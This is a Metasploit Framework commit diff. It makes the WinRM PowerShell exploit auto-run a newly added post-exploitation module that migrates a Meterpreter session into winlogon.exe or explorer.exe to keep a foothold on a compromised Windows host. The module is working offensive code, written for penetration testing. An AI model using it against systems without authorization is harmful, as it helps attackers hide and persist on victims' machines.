Switc smart mgirate to post mod as it should be

David Maloney · David Maloney · commit 00b9fb3c90bc · 2012-10-31T17:03:49.000-05:00
diff --git a/modules/exploits/windows/winrm/winrm_powershell.rb b/modules/exploits/windows/winrm/winrm_powershell.rb
@@ -37,7 +37,7 @@ def initialize(info = {})
 				{
 					'WfsDelay'     => 30,
 					'EXITFUNC' => 'thread',
-					'InitialAutoRunScript' => 'smart_migrate',
+					'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
 				},
 			'Platform'       => 'win',
 			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
diff --git a/modules/post/windows/manage/smart_migrate.rb b/modules/post/windows/manage/smart_migrate.rb
@@ -0,0 +1,73 @@
+##
+# $Id$
+##
+
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Post
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'Windows Manage Process Migration',
+			'Description'   => %q{ This module will migrate a Meterpreter session.
+				It will first attempt to mgirate to winlogon.exe . If that fails it will
+				then look at all of the explorer.exe processes. If there is one that exists
+				for the user context the session is already in it will try that. Failing that it will fall back
+				and try any other explorer.exe processes it finds},
+			'License'       => MSF_LICENSE,
+			'Author'        => [ 'thelightcosine'],
+			'Version'       => '$Revision$',
+			'Platform'      => [ 'win' ],
+			'SessionTypes'  => [ 'meterpreter' ]
+		))
+
+
+	end
+
+	def run
+		server = client.sys.process.open
+		original_pid = server.pid
+		print_status("Current server process: #{server.name} (#{server.pid})")
+
+		uid = client.sys.config.getuid
+
+		processes = client.sys.process.get_processes
+
+		uid_explorer_procs = []
+		explorer_procs = []
+		winlogon_procs = []
+		processes.each do |proc|
+			uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid
+			explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid
+			winlogon_procs << proc if proc['name'] == "winlogon.exe"
+		end
+
+		winlogon_procs.each { |proc| return if attempt_migration(proc['pid']) }
+		uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
+		explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
+
+		print_error "Was unable to sucessfully migrate into any of our likely candidates"
+	end
+
+
+	def attempt_migration(target_pid)
+		begin
+			print_good("Migrating to #{target_pid}")
+			client.core.migrate(target_pid)
+			print_good("Successfully migrated to process #{}")
+			return true
+		rescue ::Exception => e
+			print_error("Could not migrate in to process.")
+			print_error(e)
+			return false
+		end
+	end
+end
diff --git a/scripts/meterpreter/smart_migrate.rb b/scripts/meterpreter/smart_migrate.rb

Original file line number	Diff line number	Diff line change
`@@ -37,7 +37,7 @@ def initialize(info = {})`
`37`	`37`	`{`
`38`	`38`	`'WfsDelay' => 30,`
`39`	`39`	`'EXITFUNC' => 'thread',`
`40`		`- 'InitialAutoRunScript' => 'smart_migrate',`
	`40`	`+ 'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',`
`41`	`41`	`},`
`42`	`42`	`'Platform' => 'win',`
`43`	`43`	`'Arch' => [ ARCH_X86, ARCH_X86_64 ],`